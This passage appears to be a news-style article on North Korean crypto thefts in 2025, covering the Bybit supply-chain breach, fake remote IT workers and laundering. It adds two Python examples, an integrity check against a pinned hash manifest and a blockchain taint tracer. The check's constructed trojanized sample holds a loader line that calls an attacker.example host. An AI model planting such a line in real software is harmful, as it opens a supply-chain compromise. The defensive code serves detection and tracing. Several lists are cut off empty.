U.S. authorities attributed the operation to North Korean actors tracked as "TraderTraitor", a hacking cluster associated with the country’s broader cyber apparatus.
Threat‑intelligence analysis ties the breach to a supply‑chain compromise involving trojanized software, which gave the attackers a trusted foothold inside software the exchange relied on rather than requiring them to break into the exchange's own systems. According to CrowdStrike’s threat landscape research, a cluster it tracks as PRESSURE CHOLLIMA carried out the attack by distributing malicious software through a compromised development pipeline.
Once access was obtained, attackers transferred large amounts of cryptocurrency out of exchange infrastructure and began dispersing the funds across thousands of blockchain addresses to obscure the trail.
Blockchain analytics show that the $2.02 billion stolen by North Korean groups in 2025 represented a 51% increase year‑over‑year, even though the number of attacks declined.
This shift reflects a strategic change: instead of many smaller hacks, the attackers increasingly pursue high‑impact intrusions targeting major crypto platforms and financial services infrastructure.
Researchers describe this approach as “industrialized” cybercrime, where operations are coordinated at scale and supported by dedicated infrastructure for access, theft, and laundering.
The Bybit incident illustrates how attackers increasingly exploit trusted software relationships rather than attacking an exchange's own systems head‑on.
By compromising developer infrastructure or software dependencies, attackers can deliver trojanized updates or tools that victims install themselves. Because the malicious code arrives through a channel the victim already trusts, it can confer privileged access without triggering the defenses that watch for outside intrusion.
Supply‑chain attacks have become a defining technique in modern cyber operations because they leverage the trust embedded in software ecosystems.
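The control that breaks this pattern is refusing to run a delivered artifact unless it matches digests pinned at build time. The following is an added example, not code from the original article or from Bybit, CrowdStrike, or any product named here; the bundle contents, file names, and manifest format are constructed for illustration. It verifies a "bundle" (a mapping of file paths to bytes) against a pinned SHA‑256 manifest and reports modified, missing, and unexpected files, which is exactly what a trojanized update would trip.

```python
import hashlib
import hmac
from dataclasses import dataclass, field


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed sample release (hypothetical signing web app with two JS files).
CLEAN_BUNDLE = {
    "app/main.js": b"export function sign(tx) { return wallet.sign(tx); }\n",
    "app/vendor.js": b"export const VERSION = '1.0.0';\n",
}

# The pinned manifest is produced at build time from the clean bundle.
# In practice it must itself be signed and fetched independently of the bundle,
# otherwise an attacker who can replace the bundle can replace the manifest too.
PINNED_MANIFEST = {path: sha256_hex(data) for path, data in CLEAN_BUNDLE.items()}

# Constructed trojanized bundle: main.js now routes the transaction through
# attacker-controlled code, and an extra loader file has been added.
TROJANIZED_BUNDLE = dict(CLEAN_BUNDLE)
TROJANIZED_BUNDLE["app/main.js"] = b"export function sign(tx) { return wallet.sign(swap(tx)); }\n"
TROJANIZED_BUNDLE["app/loader.js"] = b"fetch('https://attacker.example/x');\n"


@dataclass
class VerifyResult:
    modified: list = field(default_factory=list)    # digest mismatch
    missing: list = field(default_factory=list)     # pinned but absent
    unexpected: list = field(default_factory=list)  # present but not pinned

    @property
    def ok(self) -> bool:
        return not (self.modified or self.missing or self.unexpected)


def verify_bundle(bundle: dict, manifest: dict) -> VerifyResult:
    """Compare every file in `bundle` (path -> bytes) against the pinned manifest.
    Any of the three discrepancy classes is grounds to refuse the install."""
    result = VerifyResult()
    for path, expected in manifest.items():
        if path not in bundle:
            result.missing.append(path)
        elif not hmac.compare_digest(sha256_hex(bundle[path]), expected):
            result.modified.append(path)
    for path in bundle:
        if path not in manifest:
            result.unexpected.append(path)
    for lst in (result.modified, result.missing, result.unexpected):
        lst.sort()
    return result


def install_if_verified(bundle: dict, manifest: dict) -> bool:
    """Install gate: True only when the bundle matches the pinned manifest exactly."""
    return verify_bundle(bundle, manifest).ok


if __name__ == "__main__":
    print("clean bundle ok:", install_if_verified(CLEAN_BUNDLE, PINNED_MANIFEST))
    r = verify_bundle(TROJANIZED_BUNDLE, PINNED_MANIFEST)
    print("trojanized bundle ok:", r.ok)
    print("  modified:", r.modified, "unexpected:", r.unexpected, "missing:", r.missing)
```

The check is only as strong as the manifest's provenance: pin it in a lockfile committed to the repository, or sign it with a release key held outside the build pipeline, so that compromising the pipeline that produces the bundle does not also let the attacker rewrite the expected digests.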
Threat‑intelligence reporting indicates that adversaries increasingly use AI tools to improve phishing, impersonation, and reconnaissance, allowing them to scale social‑engineering campaigns and craft more convincing communications.
AI can automate tasks such as generating phishing messages, researching targets, and creating realistic personas—making it easier for attackers to gain credentials or persuade employees to grant access.
Another major tactic involves placing North Korean operatives inside companies through fraudulent remote‑employment schemes.
Authorities say the DPRK has built networks of individuals who use stolen or fabricated identities to obtain remote developer or IT jobs at technology firms—including companies connected to the crypto ecosystem.
Once employed, these workers can:
Large tech companies have reported blocking thousands of such attempts, highlighting the scale of the effort.
Security researchers say North Korean operations increasingly combine digital intrusions with “offline infiltration,” meaning access gained through human relationships—employees, contractors, or partners—rather than purely technical exploits.
This hybrid model allows attackers to bypass many traditional cybersecurity controls.
Security companies track North Korean cyber operations using cluster names rather than a single organization.
For example:
Public reporting provides fewer confirmed operational details tying specific 2025 incidents to clusters such as FAMOUS CHOLLIMA or STARDUST CHOLLIMA, though they are tracked as part of North Korea’s broader cyber‑operations landscape.
After major heists, attackers typically move funds through thousands of blockchain addresses and multiple cryptocurrencies, often converting assets rapidly to obscure their origin.
Investigations show that North Korean operators also rely on mixing services, decentralized exchanges, and cross‑chain bridges to further complicate tracing efforts.
In some cases, a large share of stolen funds can be moved or laundered within weeks of the initial breach.
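Tracing funds through that kind of dispersal is a graph problem: follow outflows from the addresses known to be attacker‑controlled, and account for dilution when stolen funds are pooled with clean deposits at a DEX, mixer, or bridge. The following is an added example, not code from the original article or from any blockchain analytics firm; the ledger, address labels, and amounts are constructed for illustration. It implements hop‑distance reachability, fan‑out counting, and the common pro‑rata ("haircut") taint model, in which each address passes on the fraction tainted/total of what it has received.

```python
from collections import defaultdict, deque

# Constructed sample ledger (NOT real chain data): (tx_id, sender, receiver, amount),
# listed in chronological order. The theft is the inflow to thief_A in t1.
TRANSFERS = [
    ("t1", "exchange_hot", "thief_A", 1000.0),  # the theft itself
    ("t2", "thief_A", "peel_1", 600.0),         # split across two peel addresses
    ("t3", "thief_A", "peel_2", 400.0),
    ("t4", "peel_1", "mixer_in", 590.0),        # bulk to a mixer deposit address
    ("t5", "peel_1", "thief_A", 10.0),          # small change sent back
    ("t6", "peel_2", "dex_1", 200.0),           # swaps via two DEX deposit addresses
    ("t7", "peel_2", "dex_2", 200.0),
    ("t8", "merchant", "dex_1", 50.0),          # unrelated clean deposit into dex_1
    ("t9", "dex_1", "bridge_1", 250.0),         # pooled funds move to a cross-chain bridge
]

SEEDS = {"thief_A"}  # attacker-controlled address identified from the incident


def hops_from_seeds(transfers, seeds):
    """Breadth-first reachability: minimum number of transfers separating each
    address from the seed set. Addresses that never receive seed-derived funds
    are absent from the result."""
    graph = defaultdict(set)
    for _, src, dst, _ in transfers:
        graph[src].add(dst)
    dist = {s: 0 for s in seeds}
    queue = deque(seeds)
    while queue:
        node = queue.popleft()
        for nxt in graph[node]:
            if nxt not in dist:
                dist[nxt] = dist[node] + 1
                queue.append(nxt)
    return dist


def haircut_taint(transfers, seeds):
    """Pro-rata taint. Each address carries tainted_in/total_in of what it has
    received so far, and every outgoing transfer carries that fraction of its
    amount. Seeds are always 100% tainted. Returns (tainted amount per tx,
    tainted fraction per address)."""
    tainted_in = defaultdict(float)
    total_in = defaultdict(float)
    per_tx = {}

    def fraction(addr):
        if addr in seeds:
            return 1.0
        return tainted_in[addr] / total_in[addr] if total_in[addr] else 0.0

    for tx, src, dst, amt in transfers:
        tainted = amt * fraction(src)
        per_tx[tx] = tainted
        tainted_in[dst] += tainted
        total_in[dst] += amt
    addrs = {a for _, s, d, _ in transfers for a in (s, d)} | set(seeds)
    return per_tx, {a: fraction(a) for a in addrs}


def fan_out(transfers):
    """Distinct receiving addresses per sender; a high value from a freshly
    funded address is a typical post-theft dispersal signal."""
    out = defaultdict(set)
    for _, src, dst, _ in transfers:
        out[src].add(dst)
    return {src: len(dsts) for src, dsts in out.items()}


def flagged_addresses(transfers, seeds, min_fraction=0.5):
    """Addresses whose received funds are at least min_fraction seed-tainted."""
    _, fractions = haircut_taint(transfers, seeds)
    return sorted(a for a, f in fractions.items() if f >= min_fraction)


if __name__ == "__main__":
    hops = hops_from_seeds(TRANSFERS, SEEDS)
    per_tx, fractions = haircut_taint(TRANSFERS, SEEDS)
    for tx, src, dst, amt in TRANSFERS:
        print(f"{tx}: {src:>12} -> {dst:<9} {amt:8.2f}  tainted={per_tx[tx]:8.2f}  hop={hops.get(dst, '-')}")
    print("fan-out:", fan_out(TRANSFERS))
    print("flagged:", flagged_addresses(TRANSFERS, SEEDS))
```

Note how dex_1 dilutes the taint: it received 200 stolen and 50 clean units, so the 250 it forwards to bridge_1 counts as 80% tainted rather than 100%. Real tracing tools also handle FIFO/LIFO attribution, UTXO chains, and cross‑chain hops, but the structure is the same: seed set, ordered transfers, and a taint rule applied per hop.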
U.S. and international officials warn that these cyber operations are not just criminal activity—they are a revenue source for the North Korean state.
Government statements say proceeds from cybercrime help the regime evade sanctions and support weapons development programs, including ballistic missiles and nuclear capabilities.
Because of that link, law‑enforcement agencies have increased efforts to track laundering networks and disrupt the infrastructure behind the operations.
The 2025 record theft highlights a major shift in the threat landscape:
Security researchers say the trend underscores the need for stronger supply‑chain security, identity verification for remote workers, and advanced monitoring of blockchain transactions.
As crypto adoption grows, the methods refined in 2025 suggest that state‑sponsored cybercrime will remain one of the industry’s most persistent—and sophisticated—security challenges.